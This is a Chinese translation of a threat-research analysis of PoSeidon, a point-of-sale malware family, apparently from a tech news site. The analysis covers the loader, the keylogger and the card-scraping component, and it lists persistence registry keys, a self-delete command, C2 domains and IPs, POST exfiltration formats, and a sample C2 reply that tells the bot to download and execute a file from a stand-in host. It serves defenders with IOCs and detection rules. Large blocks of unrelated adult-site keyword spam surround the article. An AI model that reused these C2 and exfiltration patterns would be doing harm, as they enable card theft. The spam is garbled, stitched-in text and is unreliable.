国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

波塞冬(PoSeidon)——深入探究銷售點終端惡意軟件

安全 終端安全
當消費者從零售商處采購時,交易是通過銷售點終端(PoS)系統處理完成的。當使用信用卡或借記卡時,PoS系統被用來讀取存儲在信用卡背面磁條中的信息。一旦該信息被從商家處盜取后,它可被編碼到磁條中,并在一張新卡上加以使用。由于攻擊者能夠輕松地利用盜取的信用卡信息牟利,因而針對這一寶貴信息的犯罪市場一直都存在。

思科安全解決方案(CSS) 團隊由具備法律實施、企業安全和技術安全等豐富背景的信息安全專家組成。該團隊直接與思科Talos安全情報和研究小組展開合作,旨在識別已知和未知的威脅、量化風險并劃分其優先級,最大限度降低未來的風險。

當消費者從零售商處采購時,交易是通過銷售點終端(PoS)系統處理完成的。當使用信用卡或借記卡時,PoS系統被用來讀取存儲在信用卡背面磁條中的信息。一旦該信息被從商家處盜取后,它可被編碼到磁條中,并在一張新卡上加以使用。由于攻擊者能夠輕松地利用盜取的信用卡信息牟利,因而針對這一寶貴信息的犯罪市場一直都存在。涉及PoS惡意軟件的事件一直呈現上升勢頭,這對許多大型企業和家庭式企業都造成了影響,同時也引起了眾多媒體的關注。可以肯定的是,大量金融信息和個人信息的存在,使得這些企業及其零售PoS系統仍會成為極具吸引力的攻擊目標。

概況

今天要介紹的是一款新的針對PoS系統的惡意軟件,這款軟件會在PoS內存中尋找信用卡信息,并將這些信息發送到服務器,服務器使用了.ru頂級域名,這些信息可能會被重新賣出去。這個新的惡意軟件家族(我們取名為PoSeidon)中有些組件,如下圖所示:

波塞冬(PoSeidon)——深入探究銷售點終端惡意軟件

首先它會加載Loader,它會試圖留存在目標系統中,防止系統重啟。Loader之后會聯系命令與控制(command and control)服務器,接收一個包含另一個程序的URL,并下載執行。下載下來的程序是FindStr,它會安裝一個鍵盤記錄器,并且在PoS設備中掃描數字序列,這些數字序列就有可能是信用卡號碼。如果經過驗證,這些數字確實是信用卡號碼,鍵盤記錄和信用卡號碼就會被編碼并發送到一個服務器。#p#

技術細節

鍵盤記錄器

這個文件的SHA256校驗值是 334079dc9fa5b06fbd68e81de903fcd4e356b4f2d0e8bbd6bdca7891786c39d4,可能是PoS系 統攻擊的源頭。我們把這個文件叫做鍵盤記錄器(KeyLogger)是基于它的調試信息:

波塞冬(PoSeidon)——深入探究銷售點終端惡意軟件

一旦被執行,這個文件就會把自身復制到%SystemRoot%\system32\.exe或者是%UserProfile%\.exe,并在HKLM(或者HKCU)\Software\Microsoft\Windows\CurrentVersion\Run處加入注冊表項。

這個文件還會打開HKCU\Software\ LogMeIn Ignition,打開并刪除PasswordTicket鍵值,獲取Email鍵值,它還會刪除注冊表目錄樹HKCU\Software \LogMeInIgnition\\Profiles\*。

文件會使用POST方法把數據發送到下列URI中的一個地址:

wondertechmy[.]com/pes/viewtopic.php
wondertechmy[.]ru/pes/viewtopic.php
wondwondnew[.]ru/pes/viewtopic.php

URI格式是

uid=%I64u&win=%d.%d&vers=%s

波塞冬(PoSeidon)——深入探究銷售點終端惡意軟件

鍵盤記錄器組件是用來竊取密碼的,也有可能是感染機器的初始途徑。

Loader

我們把這個文件叫做loader是基于它的調試信息:

波塞冬(PoSeidon)——深入探究銷售點終端惡意軟件

一經運行,Loader會檢查它是不是以以下兩個文件名執行的:

WinHost.exe
WinHost32.exe

如果不是,它就會確保沒有以WinHost名字正在運行的Windows服務。Loader會將自身復制到%SystemRoot%\System32\WinHost.exe,覆蓋掉那里任何可能以相同名字命名的文件。接下來,Loader會啟動一個名為WinHost的服務。

波塞冬(PoSeidon)——深入探究銷售點終端惡意軟件

之所以要這么做是因為即使當前用戶注銷,它也要留在內存中。如果Loader不能將自己變成服務,它就會把在內存中的自己的其他實例終 止掉。然后將自身復制到%UserProfile%\WinHost32.exe,并且安裝注冊表鍵HKCU\Microsoft\Windows\CurrentVersion\Run\\WinHost32。最后,它會創建一個新進程進行 %UserProfile%\WinHost32.exe。

既然現在它可以一直留在系統中,Loader就會執行下面的命令將自己刪除:

cmd.exe /c del >> NUL

在內存中運行的Loader會嘗試讀取 %SystemRoot%\System32\WinHost.exe.cfg這里的配置文件。 這份文件中有一個URL列表,這些URL列表是要被加到已經被硬編碼到Loader的URL列表里的。#p#

然后Loader會聯系其中某個被硬編碼的C&C服務器:

linturefa.com
xablopefgr.com
tabidzuwek.com
lacdileftre.ru
tabidzuwek.com
xablopefgr.com
lacdileftre.ru
weksrubaz.ru
linturefa.ru
mifastubiv.ru
xablopefgr.ru
tabidzuwek.ru

對應的IP地址:

151.236.11.167
185.13.32.132
185.13.32.48
REDACTED at request of Federal Law Enforcement
31.184.192.196
91.220.131.116
91.220.131.87

如果上面的某個域名解析到了某個IP地址,程序就會發送HTTP POST請求,請求使用下面的user-agent字串:

Mozilla/4.0 (compatible; MSIE 8.0;Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729;.NET CLR 3.0.30729; Media Center PC 6.0)

POST數據會被發送到:

  1. <IP ADDRESS>/ldl01/viewtopic.php  
  2. <IP ADDRESS>/pes2/viewtopic.php  

POST數據格式為:

uid=%I64u&uinfo=%s&win=%d.%d&bits=%d&vers=%s&build=%s

Loader應從C&C服務器獲取這樣的回應:

{<命令字符(CommandLetter)>:<參數(ArgumentString)>}

示例:

{R:http://badguy.com/malwarefilename.exe}

{b:pes13n|373973303|https://01.220.131.116/ldl01/files/pes13n.exe}

波塞冬(PoSeidon)——深入探究銷售點終端惡意軟件

獲取和執行了服務器響應中的可執行文件,PoSeidon的第二部分登場。#p#

FindStr

我們把這個文件叫做FindStr是基于它的調試信息:

波塞冬(PoSeidon)——深入探究銷售點終端惡意軟件

這個文件會在系統中安裝一個很小的鍵盤記錄器,這個鍵盤記錄器和這里的描述極為相似。這個鍵盤記錄器截獲的數據稍后會被發送至服務器。

這個惡意軟件會在內存中尋找特定的數字序列:

· 以6, 5, 4開頭的16位數字 (Discover, Visa, Mastercard)

· 以3開頭的15位數字(AMEX)

然后它會使用Luhn算法驗證這些數字是不是真的信用卡或借記卡號碼,代碼片段如下:

波塞冬(PoSeidon)——深入探究銷售點終端惡意軟件

接下來,它會嘗試解析下面的這些域名,其中有些域名是很有名的數據竊取服務器:

quartlet.com
horticartf.com
kilaxuntf.ru
dreplicag.ru
fimzusoln.ru
wetguqan.ru

如果上面的某個域名解析到了某個IP地址,程序就會發送HTTP POST請求,請求使用下面的user-agent字串:

Mozilla/4.0 (compatible; MSIE 8.0;Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729;.NET CLR 3.0.30729; Media Center PC 6.0)

POST數據會被發送到:

  1. <IPADDRESS>/pes13/viewtopic.php 

數據格式為:

oprat=2&uid=%I64u&uinfo=%s&win=%d.%d&vers=%s

<IPADDRESS>/pes13/viewtopic.php

可選的POST數據(data:信用卡號碼,logs:鍵盤記錄數據)

  1. &data=<XORed_with_0x2A_then_base64_data_unk> 
  2. logs=<XORed_with_0x2A_then_base64_data_unk> 

發送到服務器上的信用卡號碼和鍵盤記錄器的數據都是經過XOR運算并且用base64編碼的。

服務器的回應應該是:

這個機制可以讓惡意軟件根據從服務器收到的指令進行自我更新。#p#

Loader vs FindStr

波塞冬(PoSeidon)——深入探究銷售點終端惡意軟件

使用Bindiff對未打包的Loader(版本11.4 )和未打包的FindStr(版本7.1)進行對比,結果顯示62%的函數相同。惡意軟件背后的攻擊者可能開發了某些核心函數,并將它們編譯進庫,然后他們開發的其他項目可以直接使用這些函數。

IOC

波塞冬(PoSeidon)——深入探究銷售點終端惡意軟件

點擊查看終端IOC版本

Win.Trojan.PoSeidon.RegistryItem.ioc
Win.Trojan.PoSeidon.ProcessItem.ioc
Win.Trojan.PoSeidon.FileItem.ioc

域名

linturefa.com
xablopefgr.com
tabidzuwek.com
linturefa.ru
xablopefgr.ru
tabidzuwek.ru
weksrubaz.ru
mifastubiv.ru
lacdileftre.ru
quartlet.com
horticartf.com
kilaxuntf.ru
dreplicag.ru
fimzusoln.ru
wetguqan.ru

IP地址:

151.236.11.167
185.13.32.132
185.13.32.48
REDACTED at request of Federal Law Enforcement
31.184.192.196
91.220.131.116
91.220.131.87
REDACTED at request of Federal Law Enforcement

結論

PoSeidon是又一個針對PoS系統的惡意軟件,它顯示出其作者的高超技術。攻擊者會繼續針對PoS系統進行攻擊,并且使用各種混淆手段逃避檢測。只要PoS攻擊能夠提供回報,攻擊者們就會繼續研發新的惡意軟件。網絡管理員們應該要保持警惕,并且使用最佳解決方案保證免受這些惡意軟件的攻擊。

Snort Rules: 33836-33852. 請參照Defense Center or FIREsight 管理終端的更新信息。

保護用戶防御威脅

波塞冬(PoSeidon)——深入探究銷售點終端惡意軟件

我們鼓勵大家通過面向威脅的方法架構,開始最佳的安全實踐。在當今不斷變化的安全形勢下,這種以威脅為中心的、合理的方法架構,將完全保護您的網絡并貫穿“之前、期中、之后”的威脅攻擊的全過程。它基于卓越的可視化能力,持續的控制能力和高級威脅防御,包括外延網絡和貫穿攻擊的全過程。

責任編輯:藍雨淚 來源: 51CTO.com
相關推薦

2015-07-22 10:33:04

2012-12-17 09:47:33

2022-10-27 13:38:25

2018-02-27 11:11:20

Wi-Fi

2023-08-07 07:44:44

2022-10-20 12:07:20

2011-06-07 14:58:03

2025-02-21 11:15:27

2021-11-05 05:40:14

勒索軟件攻擊數據泄露

2017-02-28 12:41:03

2023-02-28 14:16:52

邊緣計算數據中心

2025-01-02 14:50:34

MyBatis開發緩存

2012-09-05 09:40:29

2020-12-31 10:00:40

PoS終端終端安全網絡攻擊

2015-11-05 10:07:56

2012-12-14 12:53:15

2012-11-12 10:03:27

2012-06-07 10:30:27

2015-11-19 20:06:26

聯迪

2013-07-15 11:03:52

802.11ac技術802.11ac
點贊
收藏

51CTO技術棧公眾號

久久久久久久久久久国产| 精品麻豆av| 色综合桃花网| 天天综合天天综合色| 大伊香蕉精品视频在线| 日韩福利视频网| 久久久久久一区| 欧美日韩亚洲一区| 成人精品一区二区三区| jvid福利在线一区二区| 茄子视频成人在线| 亚洲精品进入| 538国产精品一区二区免费视频 | 狼人综合视频| 欧美成人福利视频| 大地资源网3页在线观看| 欧美午夜精品一区二区蜜桃 | 精品视频在线一区二区| 亚洲高清在线精品| 91天堂在线| 亚洲综合色婷婷| 亚洲色图16p| 色狠狠av一区二区三区| 国产高清在线观看| 欧美影视一区在线| 国内精品不卡| 欧美精品一区二区三区高清aⅴ| 欧美家庭影院| 亚洲午夜精品久久久久久性色| 日韩激情电影| 色妞欧美日韩在线| 成午夜精品一区二区三区软件| 性欧美视频videos6一9| 中文精品一区二区| 91免费高清视频| 久久国产直播| 欧美亚洲色图视频| 中文字幕不卡一区| 黄色小视频在线播放| 欧美综合一区二区| 免费污视频在线| 尤物精品国产第一福利三区| 岛国成人av| 91手机在线观看| 精品一区二区三区久久| 国产黄色一级网站| 亚洲综合清纯丝袜自拍| 91成人高清| 亚洲四色影视在线观看| 伦理一区二区| 含羞草久久爱69一区| 丁香六月综合激情| 粉嫩tv在线播放| 欧美本精品男人aⅴ天堂| 99精品美女视频在线观看热舞| 国产成人精品视频在线| 久久久久久网| 15—17女人毛片| 欧美高清www午色夜在线视频| 欧美aaa大片视频一二区| 777777777亚洲妇女| 亚洲国产一区二区三区高清| 国产无限制自拍| 黄色成人av网| 亚洲欧美在线成人| 国产精品网址在线| 国产福利一区二区三区视频在线| 午夜爽爽爽男女免费观看影院| 欧美日韩一区二区三区四区五区 | 欧美zozozo| 哺乳挤奶一区二区三区免费看| 91在线视频精品| 国产精品亚洲第一区在线暖暖韩国| aaaaa毛片| 亚洲激情视频网| 欧美亚洲高清| avav在线播放| 91国内精品野花午夜精品| 日韩专区视频| 欧美日韩免费观看一区| 亚洲女爱视频在线| 午夜激情在线播放| 91久久久久久久一区二区| www.日韩精品| 亚洲精品白浆| 国产精品a久久久久久| 国产成人福利片| 国产福利片在线| 久久噜噜噜精品国产亚洲综合| 天堂影院一区二区| 情趣视频网站在线免费观看| 色综合伊人色综合网站| 国产手机视频一区二区| 国产网站av| 久久久成人精品视频| 一区在线免费观看| 国内av免费| 欧美大码xxxx| 国产成人精品在线看| 日韩伦理在线观看| 91精品久久久久久久久不口人| 久久精品一区四区| 成人在线黄色| 一区二区三区四区不卡| 欧美日韩一区二区在线观看| 成人av动漫在线观看| 99视频在线视频| www国产亚洲精品久久网站| 首页欧美精品中文字幕| 国产在线播放av| 国产精品毛片a∨一区二区三区|国| 久久久影视传媒| 日韩免费小视频| 日韩精品一区二区三区四区五区| 欧美性xxxx极品hd满灌| 欧美顶级毛片在线播放| 国产aaa一级片| 综合国产在线观看| 国产成人午夜片在线观看高清观看| 日本aa在线| 亚洲国产一区二区精品视频| 欧美一卡二卡三卡| 国产伦理一区| 日韩三级影院| 精品一卡二卡三卡四卡日本乱码 | 欧美精品色婷婷五月综合| 亚洲精品在线视频| 蜜乳av一区二区| 欧美激情黑人| 一区二区三区四区在线免费视频| 2019av中文字幕| 在线观看欧美精品| 国产女人18水真多18精品一级做| 欧美网站在线| 国内精品久久久久久久影视蜜臀| 在线观看欧美理论a影院| 成人av色网站| 亚洲一级少妇| 亚洲少妇视频| 国产爆乳无码一区二区麻豆| 欧美男人的天堂一二区| 你懂的国产精品永久在线| 91看片一区| 国产欧美精品aaaaaa片| 国产精品99久久久久久www| 久久综合色一综合色88| 精灵使的剑舞无删减版在线观看| www 成人av com| 欧美一区二区三区精品| 国产在线精品一区二区夜色| 国产欧美自拍| 中文字幕高清20页| 久久天天躁狠狠躁夜夜躁2014| 国产一区不卡在线| 国产精东传媒成人av电影| www.欧美日本| 欧美福利视频网站| 国产一区二区电影| 成人欧美一区二区三区的电影| 日韩av综合| 开心色怡人综合网站| 五月综合激情日本mⅴ| 午夜综合激情| av有声小说一区二区三区| 一区三区视频| 欧美一级二级视频| 99aiav| 久久91超碰青草是什么| 又紧又大又爽精品一区二区| 99re热视频精品| 亚洲三级色网| 欧美大片免费高清观看| 久久久久久久久久网| 欧美亚洲视频一区二区| 欧美日韩精品综合在线| 亚洲自拍偷拍综合| 91亚洲国产成人精品一区二三| 欧美色涩在线第一页| 日本免费一区二区三区| 污的网站在线观看| 久久一区亚洲| 亚洲欧美另类自拍| 日本最新一区二区三区视频观看| 日本福利专区在线观看| y111111国产精品久久久| 亚洲国产专区| 国产精一品亚洲二区在线视频| 国产精品女同互慰在线看| 欧美视频一区二区三区四区| 精品国产成人在线影院| 久久国产精品-国产精品| av免费看网址| free亚洲| 国产成人午夜| 6080亚洲理论片在线观看| 国产激情精品久久久第一区二区| 日韩欧美国产电影| 国产精品永久免费观看| 国产精品一二三在线观看| 欧美成人hd|